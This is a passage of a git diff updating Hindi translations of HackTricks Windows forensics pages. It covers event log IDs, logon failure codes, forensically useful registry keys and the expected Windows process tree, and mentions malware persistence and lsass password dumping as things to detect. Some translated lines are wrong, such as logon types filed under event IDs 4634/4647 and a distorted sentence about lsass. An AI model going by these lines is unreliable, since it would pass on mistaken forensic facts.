प्रिंटर, सेवाएं) -लॉग `C:\Windows\System32\config` में पहले Windows Vista से पहले और `C:\Windows\System32\winevt\Logs` में Windows Vista के बाद स्थित हैं। Windows Vista से पहले, इवेंट लॉग बाइनरी प्रारूप में थे और इसके बाद, वे **XML प्रारूप** में हैं और **.evtx** एक्सटेंशन का उपयोग करते हैं। +लॉग `C:\Windows\System32\config` में पहले Windows Vista से पहले और `C:\Windows\System32\winevt\Logs` में Windows Vista के बाद स्थित हैं। Windows Vista से पहले, इवेंट लॉग्स बाइनरी प्रारूप में थे और इसके बाद, वे **XML प्रारूप** में हैं और **.evtx** एक्सटेंशन का उपयोग करते हैं। -इवेंट फ़ाइलों की स्थिति सिस्टम रजिस्ट्री में मिल सकती है **`HKLM\SYSTEM\CurrentControlSet\services\EventLog\{Application|System|Security}`** +इवेंट फ़ाइलों की स्थिति को **`HKLM\SYSTEM\CurrentControlSet\services\EventLog\{Application|System|Security}`** में पा सकते हैं -इन्हें Windows इवेंट व्यूअर (**`eventvwr.msc`**) से देखा जा सकता है या [**इवेंट लॉग एक्सप्लोरर**](https://eventlogxp.com) **या** [**Evtx एक्सप्लोरर/EvtxECmd**](https://ericzimmerman.github.io/#!index.md)** जैसे अन्य उपकरणों के साथ।** +इन्हें Windows इवेंट व्यूअर (**`eventvwr.msc`**) से देखा जा सकता है या [**Event Log Explorer**](https://eventlogxp.com) जैसे अन्य उपकरणों के साथ देखा जा सकता है **या** [**Evtx Explorer/EvtxECmd**](https://ericzimmerman.github.io/#!index.md)**।** ## Windows सुरक्षा इवेंट लॉगिंग को समझना -सुरक्षा विन्यास फ़ाइल में एक्सेस इवेंट रिकॉर्ड किए जाते हैं जो `C:\Windows\System32\winevt\Security.evtx` में स्थित है। इस फ़ाइल का आकार समायोज्य है, और जब इसकी क्षमता पूरी हो जाती है, पुराने इवेंट ओवरराइट हो जाते हैं। रिकॉर्ड किए गए इवेंट में उपयोगकर्ता लॉगिन और लॉगऑफ, उपयोगकर्ता क्रियाएँ, और सुरक्षा सेटिंग्स में परिवर्तनों के साथ, साथ ही फ़ाइल, फ़ोल्डर, और साझा संपत्ति एक्सेस भी शामिल हैं। +सुरक्षा विन्यास फ़ाइल में एक्सेस इवेंट रिकॉर्ड किए जाते हैं जो `C:\Windows\System32\winevt\Security.evtx` में स्थित है। इस फ़ाइल का आकार समायोज्य है, और जब इसकी क्षमता पूरी हो जाती है, पुराने इवेंट ओवरराइट हो जाते हैं। रिकॉर्ड किए गए इवेंट में उपयोगकर्ता लॉगिन और लॉगआउट, उपयोगकर्ता क्रियाएँ, और सुरक्षा सेटिंग्स में परिवर्तन, साथ ही फ़ाइल, फ़ोल्डर, और साझा एसेट एक्सेस भी शामिल हैं। ### उपयोगकर्ता प्रमाणीकरण के लिए मुख्य इवेंट आईडी: -- **EventID 4624**: उपयोगकर्ता सफलतापूर्वक प्रमाणीकृत है। -- **EventID 4625**: प्रमाणीकरण विफलता की संकेत देता है। -- **EventIDs 4634/4647**: उपयोगकर्ता लॉगऑफ इवेंट को प्रस्तुत करता है। -- **EventID 4672**: प्रबंधनीय विशेषाधिकारों के साथ लॉगिन को दर्शाता है। +- **इवेंट आईडी 4624**: उपयोगकर्ता सफलतापूर्वक प्रमाणीकृत है। +- **इवेंट आईडी 4625**: प्रमाणीकरण विफलता की संकेत देता है। +- **इवेंट आईडी 4634/4647**: उपयोगकर्ता लॉगआउट इवेंट को प्रस्तुत करता है। +- **इवेंट आईडी 4672**: प्रबंधनीय विशेषाधिकारों के साथ लॉगिन को दर्शाता है। + +#### इवेंट आईडी 4634/4647 के अंदर उप-प्रकार: + +- **इंटरैक्टिव (2)**: सीधे उपयोगकर्ता लॉगिन। +- **नेटवर्क (3)**: साझा फ़ोल्डरों तक पहुंच। +- **बैच (4)**: बैच प्रक्रियाओं का क्रियान्वयन। +- **सेवा (5)**: सेवा लॉन्च। +- **प्रॉक्सी (6)**: प्रॉक्सी प्रमाणीकरण। +- **अनलॉक (7)**: पासवर्ड के साथ स्क्रीन अनलॉक। +- **नेटवर्क क्लियरटेक्स्ट (8)**: क्लियर टेक्स्ट पासवर्ड प्रसारण, अक्सर IIS से। +- **नए प्रमाणीकरण (9)**: पहुंच के लिए विभिन्न प्रमाणीकरण का उपयोग। +- **रिमोट इंटरैक्टिव (10)**: रिमोट डेस्कटॉप या टर्मिनल सेवाओं लॉगिन। +- **कैश इंटरैक्टिव (11)**: डोमेन कंट्रोलर से संपर्क के बिना कैश उपयोगकर्ता पहुंच। +- **कैश रिमोट इंटरैक्टिव (12)**: कैश उपयोगकर्ता पहुंच के साथ रिमोट लॉगिन। +- **कैश अनलॉक (13)**: कैश उपयोगकर्ता पहुंच के साथ अनलॉक। + +#### इवेंट आईडी 4625 के लिए स्थिति और उप-स्थिति कोड: + +- **0xC0000064**: उपयोगकर्ता नाम मौजूद नहीं है - उपयोगकर्ता नाम जांच आक्रमण का संकेत हो सकता है। +- **0xC000006A**: सही उपयोगकर्ता नाम लेकिन गलत पासवर्ड - संभावित पासवर्ड अनुमान या ब्रूट-फोर्स प्रयास। +- **0xC0000234**: उपयोगकर्ता खाता लॉकआउट - एक ब्रूट-फोर्स आक्रमण के परिणामस्वरूप कई विफल लॉगिन के बाद। +- **0xC0000072**: खाता निषेधित - निषेधित खातों तक पहुंच के अनधिकृत प्रयास। +- **0xC000006F**: अनुमति समय के बाहर लॉगिन - अनधिकृत पहुंच के संकेत के रूप में सेट लॉगिन घंटों के बाहर पहुंच के प्रयास। +- **0xC0000070**: कार्यस्थल प्रतिबंधों का उल्लंघन - अनधिकृत स्थान से लॉगिन का प्रयास। +- **0xC0000193**: खाता समाप्ति - समाप्त हो चुके उपयोगकर्ता खातों के साथ पहुंच के प्रयास। +- **0xC0000071**: समाप्त पासवर्ड - पुराने पासवर्ड के साथ लॉगिन के प्रयास। +- **0xC0000133**: समय सिंक समस्याएँ - ग्राहक और सर्वर के बीच बड़े समय अंतर के बीच अधिक विकसित आक्रमणों का संकेत हो सकता है जैसे पास-द-टिकट। +- **0xC0000224**: अनिवार्य पासवर्ड पर #### सिस्टम पावर इवेंट्स इवेंटआईडी 6005 सिस्टम स्टार्टअप को दर्शाता है, जबकि इवेंटआईडी 6006 शटडाउन को चिह्नित करता है। diff --git a/forensics/basic-forensic-methodology/windows-forensics/interesting-windows-registry-keys.md b/forensics/basic-forensic-methodology/windows-forensics/interesting-windows-registry-keys.md index e86051abf..0517d341b 100644 --- a/forensics/basic-forensic-methodology/windows-forensics/interesting-windows-registry-keys.md +++ b/forensics/basic-forensic-methodology/windows-forensics/interesting-windows-registry-keys.md @@ -2,20 +2,20 @@ ### दिलचस्प Windows रजिस्ट्री कुंजी +{% hint style="success" %} +AWS हैकिंग सीखें और अभ्यास करें:[**HackTricks प्रशिक्षण AWS रेड टीम विशेषज्ञ (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +GCP हैकिंग सीखें और अभ्यास करें: [**HackTricks प्रशिक्षण GCP रेड टीम विशेषज्ञ (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-जानें AWS हैकिंग को शून्य से हीरो तक htARTE (HackTricks AWS Red Team Expert) के साथ! +हैकट्रिक्स का समर्थन करें -HackTricks का समर्थन करने के अन्य तरीके: - -* यदि आप चाहते हैं कि आपकी **कंपनी HackTricks में विज्ञापित हो** या **HackTricks को PDF में डाउनलोड** करें तो [**सदस्यता योजनाएं देखें**](https://github.com/sponsors/carlospolop)! -* प्राप्त करें [**आधिकारिक PEASS और HackTricks स्वैग**](https://peass.creator-spring.com) -* खोजें [**The PEASS Family**](https://opensea.io/collection/the-peass-family), हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह -* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** पर **फॉलो** करें 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **अपने हैकिंग ट्रिक्स साझा करें, PRs सबमिट करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में। +* [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जाँच करें! +* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर **फॉलो** करें। +* **हैकिंग ट्रिक्स साझा करें, पीआर जमा करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github रेपो में।
- +{% endhint %} ### **Windows संस्करण और मालिक जानकारी** - **`Software\Microsoft\Windows NT\CurrentVersion`** पर स्थित है, आपको Windows संस्करण, सेवा पैक, स्थापना समय, और पंजीकृत मालिक का नाम सीधे ढंग से मिलेगा। @@ -24,45 +24,45 @@ HackTricks का समर्थन करने के अन्य तरी - होस्टनाम **`System\ControlSet001\Control\ComputerName\ComputerName`** के तहत पाया जाता है। ### **समय क्षेत्र सेटिंग** -- सिस्टम का समय क्षेत्र **`System\ControlSet001\Control\TimeZoneInformation`** में संग्रहित है। +- सिस्टम का समय क्षेत्र **`System\ControlSet001\Control\TimeZoneInformation`** में संग्रहित होता है। ### **पहुंच समय ट्रैकिंग** -- डिफ़ॉल्ट रूप से, अंतिम पहुंच समय ट्रैकिंग बंद होती है (**`NtfsDisableLastAccessUpdate=1`**). इसे सक्षम करने के लिए, इस्तेमाल करें: +- डिफ़ॉल्ट रूप से, अंतिम पहुंच समय ट्रैकिंग बंद होता है (**`NtfsDisableLastAccessUpdate=1`**). इसे सक्षम करने के लिए, इस्तेमाल करें: `fsutil behavior set disablelastaccess 0` ### Windows संस्करण और सेवा पैक -- **Windows संस्करण** में संस्करण (जैसे, होम, प्रो) और इसका रिलीज (जैसे, Windows 10, Windows 11) दिखाता है, जबकि **सेवा पैक** में सुधार और कभी-कभी नए विशेषताएँ शामिल होती हैं। +- **Windows संस्करण** संस्करण (जैसे, होम, प्रो) और इसका रिलीज (जैसे, Windows 10, Windows 11) को दर्शाता है, जबकि **सेवा पैक** अपडेट हैं जिसमें सुधार और कभी-कभी नए सुविधाएँ शामिल होती हैं। ### अंतिम पहुंच समय सक्षम करना -- अंतिम पहुंच समय ट्रैकिंग सक्षम करने से आप देख सकते हैं कि फ़ाइलें कब आखिरी बार खोली गई थीं, जो जांच या सिस्टम मॉनिटरिंग के लिए महत्वपूर्ण हो सकता है। +- अंतिम पहुंच समय ट्रैकिंग को सक्षम करने से आप देख सकते हैं कि फ़ाइलें कब आखिरी बार खोली गई थीं, जो फोरेंसिक विश्लेषण या सिस्टम मॉनिटरिंग के लिए महत्वपूर्ण हो सकता है। ### नेटवर्क सूचना विवरण - रजिस्ट्री में नेटवर्क कॉन्फ़िगरेशन पर व्यापक डेटा होता है, जिसमें **नेटवर्क के प्रकार (वायरलेस, केबल, 3जी)** और **नेटवर्क श्रेणियाँ (सार्वजनिक, निजी/घर, डोमेन/काम)** शामिल हैं, जो नेटवर्क सुरक्षा सेटिंग्स और अनुमतियों को समझने के लिए महत्वपूर्ण हैं। ### क्लाइंट साइड कैशिंग (CSC) -- **CSC** साझा फ़ाइलों का कैशिंग करके ऑफ़लाइन फ़ाइल एक्सेस को बढ़ाता है। विभिन्न **CSCFlags** सेटिंग्स नियंत्रित करती हैं कि कैसे और कौन सी फ़ाइलें कैश होती हैं, प्रदर्शन और उपयोगकर्ता अनुभव पर प्रभाव डालती हैं, खासकर उन परिस्थितियों में जहां अंतरिक्षिक कनेक्टिविटी हो। +- **CSC** साझा फ़ाइलों का कैशिंग करके ऑफ़लाइन फ़ाइल एक्सेस को बढ़ाता है। विभिन्न **CSCFlags** सेटिंग्स नियंत्रित करती हैं कि कैसे और कौन सी फ़ाइलें कैश होती हैं, प्रदर्शन और उपयोगकर्ता अनुभव पर प्रभाव डालती हैं, विशेष रूप से अंतरिक्ष से जुड़े परिस्थितियों में। ### ऑटोस्टार्ट प्रोग्राम - विभिन्न `Run` और `RunOnce` रजिस्ट्री कुंजी में सूचीबद्ध प्रोग्राम स्वचालित रूप से स्टार्टअप पर लॉन्च होते हैं, सिस्टम बूट समय पर प्रभाव डालते हैं और मालवेयर या अवांछित सॉफ़्टवेयर की पहचान के लिए महत्वपूर्ण बिंदु हो सकते हैं। ### शेलबैग्स -- **शेलबैग्स** न केवल फ़ोल्डर दृश्य के लिए पसंद रखते हैं बल्कि यदि फ़ोल्डर अब मौजूद नहीं है तो फ़ोल्डर एक्सेस के फोरेंसिक साक्ष्य भी प्रदान करते हैं। वे जांचों के लिए अनमोल हैं, अन्य माध्यमों के माध्यम से स्पष्ट न होने वाली उपयोगकर्ता गतिविधि का पता लगाने के लिए। +- **शेलबैग्स** न केवल फ़ोल्डर दृश्यों के लिए पसंद रखते हैं बल्कि यदि फ़ोल्डर अब मौजूद नहीं है तो फ़ोल्डर एक्सेस के फोरेंसिक साक्ष्य भी प्रदान करते हैं। वे जांचों के लिए अमूल्य हैं, अन्य साधनों के माध्यम से स्पष्ट नहीं होने वाली उपयोगकर्ता गतिविधि का पता लगाने के लिए। -### USB जानकारी और फोरेंसिक्स -- USB डिवाइस के बारे में रजिस्ट्री में संग्रहित विवरण एक कंप्यूटर से कनेक्ट किए गए कौन से डिवाइस का पता लगाने में मदद कर सकते हैं, संवेदनशील फ़ाइल स्थानांतरण या अनधिकृत पहुंच घटनाओं से एक डिवाइस को जोड़ सकते हैं। +### USB सूचना और फोरेंसिक्स +- USB डिवाइस के बारे में रजिस्ट्री में संग्रहित विवरण एक कंप्यूटर से कनेक्ट किए गए कौन से डिवाइस थे, संवेदनशील फ़ाइल स्थानांतरण या अनधिकृत पहुंच घटनाओं से डिवाइस को जोड़ सकते हैं। ### वॉल्यूम सीरियल नंबर -- **वॉल्यूम सीरियल नंबर** एक फ़ाइल सिस्टम के विशिष्ट उदाहरण का पता लगाने के लिए महत्वपूर्ण हो सकता है, जिसे विभिन्न उपकरणों पर फ़ाइल का मूल स्रोत स्थापित करने के लिए फोरेंसिक स्थितियों में उपयोगी होता है। +- **वॉल्यूम सीरियल नंबर** फ़ाइल सिस्टम के विशिष्ट उदाहरण का ट्रैकिंग के लिए महत्वपूर्ण हो सकता है, जिसे फ़ोरेंसिक स्थितियों में उपयोगी होता है जहां फ़ाइल का मूल स्थान विभिन्न उपकरणों के बीच स्थापित किया जाना चाहिए। ### **शटडाउन विवरण** -- शटडाउन समय और गणना (केवल XP के लिए) **`System\ControlSet001\Control\Windows`** और **`System\ControlSet001\Control\Watchdog\Display`** में रखे जाते हैं। +- शटडाउन समय और गिनती (केवल XP के लिए) **`System\ControlSet001\Control\Windows`** और **`System\ControlSet001\Control\Watchdog\Display`** में रखा जाता है। ### **नेटवर्क कॉन्फ़िगरेशन** - विस्तृत नेटवर्क इंटरफेस जानकारी के लिए, **`System\ControlSet001\Services\Tcpip\Parameters\Interfaces{GUID_INTERFACE}`** का संदर्भ दें। -- पहली और आखिरी नेटवर्क कनेक्शन समय, व्यूपीएन कनेक्शन सहित, विभिन्न पथों में लॉग किए गए हैं **`Software\Microsoft\Windows NT\CurrentVersion\NetworkList`**। +- पहली और आखिरी नेटवर्क कनेक्शन समय, VPN कनेक्शन सहित, **`Software\Microsoft\Windows NT\CurrentVersion\NetworkList`** में विभिन्न पथों के तहत लॉग किए गए हैं। ### **साझा फोल्डर** -- साझा फोल्डर और सेटिंग्स **`System\ControlSet001\Services\lanmanserver\Shares`** के तहत हैं। क्लाइंट साइड कैशिंग (CSC) सेटिंग्स ऑफ़लाइन फ़ाइल उपलब्धता निर्धारित करती हैं। +- साझा फोल्डर और सेटिंग **`System\ControlSet001\Services\lanmanserver\Shares`** के तहत हैं। क्लाइंट साइड कैशिंग (CSC) सेटिंग्स ऑफ़लाइन फ़ाइल उपलब्धता निर्धारित करती हैं। ### **स्वचालित रूप से शुरू होने वाले प्रोग्राम** - पथ जैसे **`NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Run`** और `Software\Microsoft\Windows\CurrentVersion` के तहत समान प्रविष्टियाँ विस्तार से विवरणित करती हैं जो स्टार्टअप पर चलाने के लिए सेट किए गए प्रोग्राम हैं। @@ -70,11 +70,11 @@ HackTricks का समर्थन करने के अन्य तरी ### **खोजें और टंकित पथ** - एक्सप्लोरर खोज और टंकित पथ रजिस्ट्री में ट्रैक किए जाते हैं **`NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Explorer`** के तहत WordwheelQuery और TypedPaths के लिए। -### **हाल के दस्तावेज़ और ऑफिस फ़ाइलें** -- हाल के दस्तावेज़ और ऑफिस फ़ाइलें जिनका उपयोग किया गया है, उन्हें नोट किया गया है `NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs` और विशेष ऑफिस संस्करण पथों में। +### **हाल ही में दस्तावेज़ और ऑफिस फ़ाइलें** +- हाल ही में दस्तावेज़ और ऑफिस फ़ाइलें जिनका उपयोग किया गया है, उन्हें नोट किया गया है `NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs` और विशेष ऑफिस संस्करण पथों में। ### **हाल ही में उपयोग किए गए (MRU) आइटम** -- MRU सूचियाँ, हाल के फ़ाइल पथ और कमांड दर्शाती हैं, विभिन्न `ComDlg32` और `Explorer` सबकी में `NTUSER.DAT` के तहत संग्रहित होती हैं। +- MRU सूचियाँ, हाल ही में फ़ाइल पथ और कमांड को दर्शाती हैं, विभिन्न `ComDlg32` और `Explorer` सबकी में `NTUSER.DAT` के तहत संग्रहीत होती हैं। ### **उपयोगकर्ता गतिविधि ट्रैकिंग** -- उपयोगकर्ता सहायत +- यूज़र असिस्ट diff --git a/forensics/basic-forensic-methodology/windows-forensics/windows-processes.md b/forensics/basic-forensic-methodology/windows-forensics/windows-processes.md index ca8f4d4fb..8784e0cda 100644 --- a/forensics/basic-forensic-methodology/windows-forensics/windows-processes.md +++ b/forensics/basic-forensic-methodology/windows-forensics/windows-processes.md @@ -1,54 +1,55 @@ +{% hint style="success" %} +सीखें और प्रैक्टिस करें AWS हैकिंग:[**HackTricks प्रशिक्षण AWS रेड टीम एक्सपर्ट (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +सीखें और प्रैक्टिस करें GCP हैकिंग: [**HackTricks प्रशिक्षण GCP रेड टीम एक्सपर्ट (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-जानें AWS हैकिंग को शून्य से हीरो तक htARTE (HackTricks AWS Red Team Expert)! +हैकट्रिक्स का समर्थन करें -HackTricks का समर्थन करने के अन्य तरीके: - -* यदि आप अपनी कंपनी का विज्ञापन HackTricks में देखना चाहते हैं या **HackTricks को PDF में डाउनलोड** करना चाहते हैं तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) की जांच करें! -* [**आधिकारिक PEASS और HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें -* हमारे विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) कलेक्शन, [**The PEASS Family**](https://opensea.io/collection/the-peass-family) खोजें -* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)** पर **फॉलो** करें। -* **HackTricks** (https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में PRs सबमिट करके अपने हैकिंग ट्रिक्स साझा करें। +* [**सब्सक्रिप्शन प्लान**](https://github.com/sponsors/carlospolop) की जाँच करें! +* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर **फॉलो** करें। +* **हैकिंग ट्रिक्स साझा करें, PRs सबमिट करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github रेपो में।
+{% endhint %} ## smss.exe -**सत्र प्रबंधक**.\ -सत्र 0 **csrss.exe** और **wininit.exe** (**ओएस सेवाएं**) को शुरू करता है जबकि सत्र 1 **csrss.exe** और **winlogon.exe** (**उपयोगकर्ता सत्र**) को शुरू करता है। हालांकि, आपको प्रक्रिया पेड़तल में उस बाइनरी का केवल एक प्रक्रिया देखनी चाहिए जिसके बच्चे नहीं हैं। +**सेशन मैनेजर**.\ +सेशन 0 **csrss.exe** और **wininit.exe** (**ओएस सेवाएं**) को शुरू करता है जबकि सेशन 1 **csrss.exe** और **winlogon.exe** (**उपयोगकर्ता सत्र**) को शुरू करता है। हालांकि, आपको प्रक्रिया पेड़ताल में उस बाइनरी का केवल एक प्रक्रिया देखनी चाहिए जिसके बच्चे नहीं हैं। -इसके अलावा, 0 और 1 के अलावा सत्रों का मतलब है कि RDP सत्र हो रहे हैं। +इसके अलावा, 0 और 1 के अलावा सेशन का मतलब हो सकता है कि RDP सत्र हो रहे हैं। ## csrss.exe **क्लाइंट/सर्वर रन सबसिस्टम प्रक्रिया**.\ -यह **प्रक्रियाएँ** और **धागे** प्रबंधित करता है, अन्य प्रक्रियाओं के लिए **Windows API** उपलब्ध कराता है और भी **ड्राइव अक्षर** मैप करता है, **temp फ़ाइलें** बनाता है, और **शटडाउन प्रक्रिया** को संभालता है। +यह **प्रक्रियाएँ** और **धागे** प्रबंधित करता है, अन्य प्रक्रियाओं के लिए **Windows API** उपलब्ध कराता है और भी **ड्राइव लेटर्स मैप** करता है, **temp फ़ाइलें बनाता है**, और **शटडाउन प्रक्रिया** को संभालता है। -सत्र 0 में एक **चल रहा है और सत्र 1 में एक और है** (इसलिए प्रक्रिया पेड़तल में **2 प्रक्रियाएँ** हैं)। एक और नया सत्र प्रति नई सत्र में बनाया जाता है। +सेशन 0 में एक **चल रहा है और सेशन 1 में एक और है** (तो प्रक्रिया पेड़ताल में **2 प्रक्रियाएँ** हैं)। एक और नया सत्र प्रति एक और बनाया जाता है। ## winlogon.exe -**Windows लॉगऑन प्रक्रिया**.\ -यह उपयोगकर्ता **लॉगऑन**/**लॉगऑफ** के लिए जिम्मेदार है। यह **logonui.exe** को उपयोगकर्ता नाम और पासवर्ड के लिए पूछने के लिए लॉन्च करता है और फिर **lsass.exe** को उन्हें सत्यापित करने के लिए बुलाता है। +**विंडोज लॉगऑन प्रक्रिया**.\ +यह उपयोगकर्ता **लॉगऑन**/**लॉगऑफ** के लिए जिम्मेदार है। यह **logonui.exe** को उपयोगकर्ता नाम और पासवर्ड के लिए पूछने के लिए लॉन्च करता है और फिर उन्हें सत्यापित करने के लिए **lsass.exe** को कॉल करता है। -फिर यह **`HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon`** में उपयुक्तित **Userinit** कुंजी के साथ निर्दिष्ट **userinit.exe** को लॉन्च करता है। +फिर यह **`HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon`** में उपयुक्तित **Userinit** कुंजी के साथ निर्धारित **userinit.exe** को लॉन्च करता है। -इसके अतिरिक्त, पिछला रजिस्ट्री में **explorer.exe** को **Shell कुंजी** में होना चाहिए या यह एक **मैलवेयर स्थायित्व विधि** के रूप में दुरुपयोग किया जा सकता है। +इसके अलावा, पिछला रजिस्ट्री में **explorer.exe** को **शैल कुंजी** में होना चाहिए या यह एक **मैलवेयर स्थायित्व विधि** के रूप में दुरुपयोग किया जा सकता है। ## wininit.exe -**Windows प्रारंभीकरण प्रक्रिया**. \ +**विंडोज प्रारंभीकरण प्रक्रिया**. \ यह सत्र 0 में **services.exe**, **lsass.exe**, और **lsm.exe** को लॉन्च करता है। केवल 1 प्रक्रिया होनी चाहिए। ## userinit.exe -**उपयोगकर्ता प्रारंभिकरण एप्लिकेशन**.\ -**ntduser.dat in HKCU** को लोड करता है और **उपयोगकर्ता पर्यावरण** को प्रारंभ करता है और **लॉगऑन स्क्रिप्ट** और **GPO** को चलाता है। +**उपयोगकर्ता लॉगऑन एप्लिकेशन**.\ +**ntduser.dat in HKCU** को लोड करता है और **उपयोगकर्ता पर्यावरण** को प्रारंभ करता है और **लॉगऑन स्क्रिप्ट्स** और **GPO** को चलाता है। यह **explorer.exe** को लॉन्च करता है। @@ -56,49 +57,49 @@ HackTricks का समर्थन करने के अन्य तरी ## lsm.exe **स्थानीय सत्र प्रबंधक**.\ -यह smss.exe के साथ काम करता है ताकि उपयोगकर्ता सत्रों को प्रबंधित कर सके: लॉगऑन/लॉगऑफ, शैल शुरू, डेस्कटॉप लॉक/अनलॉक, आदि। +यह smss.exe के साथ काम करता है ताकि उपयोगकर्ता सत्रों को प्रबंधित कर सके: लॉगऑन/लॉगऑफ, शैल प्रारंभ, डेस्कटॉप लॉक/अनलॉक, आदि। W7 के बाद lsm.exe को एक सेवा में रूपांतरित किया गया था (lsm.dll)। -W7 में केवल 1 प्रक्रिया होनी चाहिए और उनमें से एक DLL चलाने वाली सेवा। +W7 में केवल 1 प्रक्रिया होनी चाहिए और उनमें से एक सेवा DLL चल रही होगी। ## services.exe **सेवा नियंत्रण प्रबंधक**.\ -यह **सेवाएं** जो **ऑटो-स्टार्ट** और **ड्राइवर** के रूप में विन्यस्त की गई हैं को **लोड** करता है। +यह **सेवाएं** जो **ऑटो-स्टार्ट** और **ड्राइवर्स** के रूप में कॉन्फ़िगर की गई हैं को **लोड** करता है। यह **svchost.exe**, **dllhost.exe**, **taskhost.exe**, **spoolsv.exe** और बहुत कुछ के मूल प्रक्रिया है। सेवाएं `HKLM\SYSTEM\CurrentControlSet\Services` में परिभाषित हैं और यह प्रक्रिया सेवा जानकारी का मेमोरी में डेटाबेस बनाए रखती है जिसे sc.exe द्वारा पूछा जा सकता है। -ध्यान दें कि **कुछ सेवाएं** अपने आप में एक **अपनी प्रक्रिया में चल रही होंगी** और अन्य **svchost.exe प्रक्रिया को साझा करेंगी**। +ध्यान दें कि **कुछ सेवाएं** अपने खुद के **प्रक्रिया में चल रही होंगी** और दूसरे **svchost.exe प्रक्रिया को साझा कर रही होंगी**। केवल 1 प्रक्रिया होनी चाहिए। ## lsass.exe -**स्थानीय सुरक्षा प्राधिकरण उपसिस्टम**.\ +**स्थानीय सुरक्षा प्राधिकरण सबसिस्टम**.\ यह उपयोगकर्ता **प्रमाणीकरण** के लिए जिम्मेदार है और **सुरक्षा टोकन** बनाता है। यह `HKLM\System\CurrentControlSet\Control\Lsa` में स्थित प्रमाणीकरण पैकेज का उपयोग करता है। यह **सुरक्षा घटना लॉग** में लिखता है और केवल 1 प्रक्रिया होनी चाहिए। -ध्यान रखें कि इस प्रक्रिया को पासवर्ड डंप करने के लिए अधिक हमले किए जाते हैं। +ध्यान रखें कि यह प्रक्रिया पासवर्ड डंप करने के लिए अधिक आक्रामक है। ## svchost.exe -**सामान्य सेवा होस्ट प्रक्रिया**.\ +**जेनेरिक सेवा होस्ट प्रक्रिया**.\ यह एक साझा प्रक्रिया में कई DLL सेवाओं को होस्ट करता है। -आम तौर पर, आपको देखने को मिलेगा कि **svchost.exe** `-k` ध्वज के साथ लॉन्च होता है। यह रजिस्ट्री **HKEY\_LOCAL\_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost** में एक कुंजी होगी जिसमें -k में उल्लिखित तर्क होगा जो एक ही प्रक्रिया में लॉन्च करने के लिए सेवाएं होंगी। +आम तौर पर, आपको देखने को मिलेगा कि **svchost.exe** `-k` ध्वज के साथ लॉन्च हो रहा है। यह रजिस्ट्री **HKEY\_LOCAL\_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost** में एक कुंजी होगी जिसमें -k में उल्लिखित तर्क के साथ एक कुंजी होगी जिसमें एक ही प्रक्रिया में लॉन्च करने के लिए सेवाएं होंगी। उदाहरण के लिए: `-k UnistackSvcGroup` लॉन्च करेगा: `PimIndexMaintenanceSvc MessagingService WpnUserService CDPUserSvc UnistoreSvc UserDataSvc OneSyncSvc` -यदि **ध्वज `-s`** भी उपयोग किया जाता है तो svchost से कहा जाता है कि इस तर्क में केवल निर्दिष्ट सेवा को ही लॉन्च करें। +यदि **ध्वज `-s`** भी उपयोग किया जाता है तो svchost से कहा जाता है कि इस तर्क में उल्लिखित सेवा को केवल लॉन्च करें। -`svchost.exe` कई प्रक्रियाएँ होंगी। यदि इनमें से कोई भी **`-k` ध्वज का उपयोग नहीं कर रहा है**, तो यह बहुत संदेहाजनक है। यदि आपको पता चलता है कि **services.exe माता प्रक्रिया नहीं है**, तो यह भी बहुत संदेहाजनक है। +`svchost.exe` कई प्रक्रियाएँ होंगी। यदि इनमें से कोई भी **`-k` ध्वज का उपयोग नहीं कर रहा है**, तो यह बहुत संदेहास्पद है। यदि आपको पता चलता है कि **services.exe माता प्रक्रिया नहीं है**, तो यह भी बहुत संदेहास्पद है। ## taskhost.exe @@ -114,9 +115,9 @@ W8 में इसे taskhostex.exe कहा जाता है और W10 **केवल 1** प्रक्रिया प्रति लॉग ऑन उपयोगकर्ता के लिए उत्पन्न होनी चाहिए। -यह **userinit.exe** से चलाया जाता है जिसे समाप्त किया जाना चाहिए, इसलिए इस प्रक्रिया के लिए कोई **माता** प्रक्रिया नहीं दिखनी चाहिए। +यह **userinit.exe** से चलाया जाता है जिसे समाप्त कर दिया जाना चाहिए, इसलिए इस प्रक्रिया के लिए **कोई माता** दिखाई नहीं देना चाहिए। # दुर्भाग्यपूर्ण 